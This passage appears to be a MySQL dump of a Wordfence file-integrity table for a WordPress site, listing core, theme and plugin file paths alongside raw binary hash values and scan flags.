�','',0,'?'),('du�a\0�2{qy!�a�B','wp-content/themes/enigma/nocontent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z?��E��q��','T�cϨh�}V%|��0�ʄ�`�p�','',0,'?'),('dw�����dS����0�','wp-content/themes/brickyard/css/woocommerce-custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�GF���}(j�ش`8','��f�\\^�7�V��Y~\\���8w4\"���','',0,'?'),('d}߷ha}a72���q','wp-content/themes/event/assets/sticky/jquery.sticky.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�V��|v��0N=?�','J��,�T���|`fX>H�4�;T�a&�=�;�','',0,'?'),('d�ڐ��ż�&!��<m�','wp-content/themes/gambit/sidebar-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƹ���v�������','�����S2?�Z8����e���qz�J�@�VUe\"','',0,'?'),('d��)��M��:J�yR�','wp-content/themes/singularity/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������uA��','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\rc�c�l��?ɴծ','9� ÂM�\0KR���&���#+�vCf��','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\"����#�\'޻','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('d�j\0K\Z.��t�z�cx','wp-content/themes/advance/inc/kirki/assets/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʦ�e3�U�k�$','�ː)��͑`�Pb��L����E��C���','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<3�8xuFR�ĖȦ�E','n��?Q��bz	��٢�)��S*��,Z�','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�N���ﭪ=j\0��','�jG�AV�sF�����j�+�-)�D����','',0,'?'),('d�~��D���*��[;','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('d�S��&<;�}ӄ�#','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��9�#=D�-��','p�� aк^�\\F}�dL0�m�dҌ��v^;m�','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('d���B�l\r����G��','wp-content/themes/graphene/style-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nB�7��U��B��','Iep�15��ȹ�Ma�W�u<&v����','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��H��%���Y','���V��/r:s�/�S��l�\"#��:�3�','',0,'?'),('e��e{��:\0�vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�84|�]��h�֤�','����Aݻ�F�d�s`����0$$�{^����=�','',0,'?'),('eM%1�jEcy��P�','wp-content/themes/graduate/inc/metabox/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YD^s)�0��ؤ$�;�','����XCl��z�[����8�`�\n��\n\'�S','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�رm:h�\rGZ�ڋY','t8uU��U��SĒ�qf����S�3i���i�u','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U��	�K-:��햴�O��ա�3','',0,'?'),('e#��Q�����\'��$','wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-default-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2h3B�뿳R�?','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('e$�Ou��o������l','wp-content/themes/auberge/assets/css/starter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qަ=e�\Z\'.^���?','@`�?�\'�d�w���5y�6MG�\0����h�p@','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :\'D<��*T;�G�','W 3\n�\'@G8y��;�FwTD���Zv�X�}��','',0,'?'),('e/�f��D`	TJk�','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','νs��Ku�z�','*4�R�Տk�\n6	�r2�BǬP9���1�-*','',0,'?'),('e7�&�+j����ϱ�@','wp-content/themes/enigma/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\0��3.��L+�:�A','\Z��{H��.��jeZ���g�	�����m(̛g9','',0,'?'),('e8����ԣ�GW&r','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%<.Yp^5$f\rrF ','�s�w��1��K��A�+^����a���)�?j ','',0,'?'),('e?|\"���\rC�&�','wp-content/themes/catch-flames/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�dt��U�g�1j�x��','��m��NA�s���n�X�I2J��(g�@�\0','',0,'?'),('eC�)Ρl̩޼8�','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ��\ZqCე+R��','��l��b����v�����mU�?UE(YfD�� t','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ek���MA�\Z9�G���','wp-content/themes/newsmag/inc/components/lazyload/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('eo�P�+�ϚMh��8�','wp-content/themes/advance/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�xIL����띧��R','�M�x��d��*˨��0G/�����A�^�','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�c�b7�qNS�','�M���G�] �?u��gP�p1�,�(�V�^���','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c��	;���*r3$X����G8ͬRK�','',0,'?'),('e��S���\rjաs(z~>','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/vibrant-ink.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i����#�b��7','9����ݯx5��X�,V%��xΗc)�5\'�)','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('e��\"�[�	���J�ے','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/data/gfonts.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�W1]��Y�ۢ�;�','���1ӖA�Rޖ��l��Ԅ]��$��9�;V�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('eǛ�^�8l_*\\��','wp-content/themes/advance/inc/kirki/assets/js/controls/switch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'?���6�	Q���6','��X=+�>dS����fPu�h�s����}:L�','',0,'?'),('eӕ�Ч�Fr�>t�Oh�','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/multicolor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��C�h���/.��-�','T�\'�nd���5���:f��65Tj�_|�$��S','',0,'?'),('e�mLgh��겫�b:�','wp-content/themes/city-store/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�h�/ ��E]C�̬','/B�>ܦ�e�:Q��~\r�$��G���Qy��N�','',0,'?'),('eއ��D�z\r\Z\n���)','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�b*�\0dH��d.','Wq$!MW^f�q]]��Y/�e��>�xW3�\"ѿ','',0,'?'),('e�Kt2��\Z�t֔�y�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/merge/merge.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��x��LE�U���','qv�OL�щ:�\\!�BM`��c\n��8W�J�S','',0,'?'),('e��CI܎�s��3G�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tr>f+2`bU�V8','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('fΜtW����O\\m$','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-preset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��\'-�R�4����',']��#�n��Neb�t.�O�>���i^���ӟ�','',0,'?'),('f_l[$�JOm!{+�*','wp-content/themes/city-store/inc/customizer/functions/social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m)���>�7P9zm��Ua','Eu�>.A\\5��pΒ�8�n��`n�}É\'�E�','',0,'?'),('f#)��\"���n','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/material.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	}qYc����c�','�l�(���z͠�l<f����89��P3�zz&$','',0,'?'),('f�z�Rf�k4<�V�0','wp-content/themes/edge/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qC!y⻮�2�\"ۘ3','}�q�Zk�L^��C��3��v\n�n�ɦ�9?�','',0,'?'),('f#	8&�!��Ԟ�`�\r','wp-content/themes/graphene/images/social/grooveshark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�7�z���]&��B[�','R�\Z��F�LⰜ�E\'YtD!�iQ���a�tk�','',0,'?'),('f*\rވ��LD^R2�','wp-content/themes/metro-magazine/images/img57.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g���^����','�ѢC��K��{<#���I���E�xxj�R���b','',0,'?'),('f7ce�f\Z�QM�8�\0L','wp-content/themes/graphene/js/jquery-ui/jquery.ui.mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C����@�\'�n��X�','\0��7����\"�\\28o(Vz���#��N=�t�L','',0,'?'),('f>�		�#\" z����','wp-content/themes/graphene/js/jquery-ui/images/ui-bg_glass_65_ffffff_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.(�\\\'��3Ȩ��','ol�h���i6�#��K@J���ہ)G�\0Jϛ7','',0,'?'),('fQ|P}�R��-\\d&�','wp-content/themes/chronus/template-parts/widgets/magazine-full-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�nP�3x�mLɗ�y','C&V…��Z���2��[�>һ}��� &���9�','',0,'?'),('fW,޲�V���IU','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-switch-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�õ���{�Z`\0','�?(KPP�.���0�;}����Ms��N�','',0,'?'),('f^��2�����4','wp-content/themes/graduate/inc/tgm-plugin/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��������\"z�3�','Gg)��e����G���F���A0��C(|rFcˀ','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'N��S.;\r��MT','���2�婢��Mz�֡�XX~��u*<�.v�~','',0,'?'),('fy\\lZ(O���um�K','wp-content/themes/graduate/inc/modules/news-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b���l����Wo','t�x#.�2��N�΢�XH�}�G��[^~Ȫ��','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f��\0ζ�|�k�TP�J','wp-content/themes/catch-responsive/css/jquery.sidr.dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��E#�F���bs\'�','��\"\"�9�Z�):��eI�.1��η\0�ڷѷ(','',0,'?'),('f��A\'Npqb�H�','wp-content/themes/graduate/inc/customizer/defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K@ၷc�&�\r','�X������� a����q��߲D�}\r�(/','',0,'?'),('f���,cd��1d��7u','wp-content/themes/wp-simple/assets/images/menu_trans.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fk�a�x\rs;��UGv',' S�+²\\���ଦ�.5�M��f��T��','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ�΂���RJVY��p','',0,'?'),('f�����T�Pn?\0E�','wp-content/themes/lovecraft/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�VS��5�:�','�L�LƚC�E|f���s?���\'\\���a�ֈ','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dղ�������5� ',':��s3]9��R�*�w��\n�+#f����ݕ','',0,'?'),('f�#a��My[`���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�L`CO����rk�','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('f���*pd ��\n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U3�\"�ӳY&tP�,','�v��nݰFP/���q ��[yG\0�M��','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('f�-�$��G2J�d�','wp-content/themes/twentynineteen/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�����/h�f\0W�','�ir���FT��n �Τ�~�NpE��Z�����z','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ��	�8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('fؕ�si\"�l�r-�^','wp-content/themes/weblog/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d}MTۡ�9��Eᾍ�','��e&�Z4X$��	\0�B�	5�;����u͛��|Q','',0,'?'),('f�j7��\\b[���&','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_]$9G�:��}��*-','�p��$�(p;P���T5̛0�Q�=x|�r�a�','',0,'?'),('f��.��!�Ӏ�k��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/colorize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=T�k$n���nu','␣���W�	f�a�������\\�j���','',0,'?'),('f둤s#%<XRX�@>�','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*x�&B���!�$fW','�.�7^V�t�Y��U�@Ď�\'~(�:>�k�','',0,'?'),('f�ނ�u��\nĸu','wp-content/themes/simpleshift/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',q=��`�qG��Ig',' ��TW��&D2eeJ!����bq�\"�w�*�ߔ>�','',0,'?'),('f�MĄ��0)\\��6�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/fold/indent-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�ӈ�72q���','�2{�˒	�/y��ת��0���\'��-$','',0,'?'),('g\n��[�q��g-	i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��O�߄_�D���','�`�YABO��k[���Ai�\"5\rg���','',0,'?'),('gP�N�A����@>��','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-scripts-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<CX-�脄�eg�h`','+��W�<J�&�Fy�MRő���e���X','',0,'?'),('g#��xz����0�ͱ','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-typography-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#Ժ&��M6S[\n\\=','!TȒ� (:-:+И�A�.�L�i2��Nۗ3C%','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',0,'�H�k�r̶�#�s��','�H�k�r̶�#�s��','x���_^�2���;�\'�GtT��Xi�3�','',0,'0'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('g<YC���%�ڽ','wp-content/themes/quicksand/css/quicksand-ganymede-elegy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��~�oD�g��g\'>�','(?��+����_��mZ���\"ȝ�8@C���9','',0,'?'),('g=�C<4��b�6�-��','wp-content/themes/weblog/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U5�v_�4Ń޸^','�d�L֝��u��Q��#:�W�\r.Ӓ�4�','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gM��A�lA��P�[��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/kirki-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('gN�#���g�D��}','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?,5}�C!��K���','=,do �`F�Tl���a�Ԋ	�,�B��','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('gV;T&�����','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/searchcursor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����qQR	�X?\Z�B','M430��+?�ŎkV.a��ˀ<\n�����N�!','',0,'?'),('gf�Ys��g�u^�','wp-content/themes/advance/css/welcome-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<hA6uPy�Rƞ����','�[��&���/ �F��*���2^�߫����','',0,'?'),('gj��vmj�Lt���C','wp-content/themes/wp-simple/inc/kirki/tests/test-bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<ZW�f��e�ɠdz','1|�9O��^q�K��6�*(c��ϭ�+�(��b','',0,'?'),('gw\r�Ot��zc�?‡','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\'���1�+�4��','�콲�o��5�~F뷘�\Z���Q�K,R��(','',0,'?'),('gx�̢���6���A�\"','wp-content/themes/advance/inc/kirki/includes/sections/class-kirki-sections-hover-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ow���[�~r]��%','zŠ�]|�t�K��)�������be��rC>D�\n','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g����O�,R��7V','wp-content/themes/wp-simple/inc/kirki/assets/scss/tooltips.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�լ�U�\n�F,��~r','��Q���.!0V��%�����D�-��}��4','',0,'?'),('g��i�v\Z0�X�A�','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��_�[T������','��P�(�Y`���A�[b�v�z>з3w\n','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�x�緞��w���z','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/wrap/hardwrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�b��ٹ���F�K�','�’�u�)&���E��}�x%mW�����:��','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g�?����|��O��\"','wp-content/themes/graphene/images/social/hyves.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����uK9��_�	���','�n^��`�Q�oh�h�:0�O�h�����\Z}�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('g�Q��t�b=>O�u','wp-content/themes/Kent/FT/colors.php',0,'|݄���Q���','|݄���Q���','SU��C��ZL҆A�;)�J��๤�\'�','',0,'?'),('gذ;Pv�6��vfz�','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/datetime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}9�DF�(+W��v','iـCr���/c��{��n\'c}�����W�M�','',0,'?'),('g�՛̒L�~�	�','wp-content/themes/hitmag/template-parts/featured-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%6˯�T�w&J��\r��','��̡�`��\0�b��txs��n�\"�\\ʡkl�,','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('h\n�z�N:�cg�','wp-includes/block-patterns/two-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('h\Z&���6��e��','wp-content/themes/saybusiness/template-parts/page-with-right-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N`�\"TN,�P�����=','#�5���PV�����W�9�B�c��In\\`�B�','',0,'?'),('h���{]њj �o\r�','wp-content/themes/education-hub/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�m�b���M��	�\"','��Ɩ+�܆��f�ڞY\ra:���!O���s\0','',0,'?'),('h�el.K\'\'�G��3','wp-content/themes/graduate/assets/plugins/css/unminified/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����id9��?���]�','�N�֞�ƕAU���_̩�e�����\r�d�','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('h 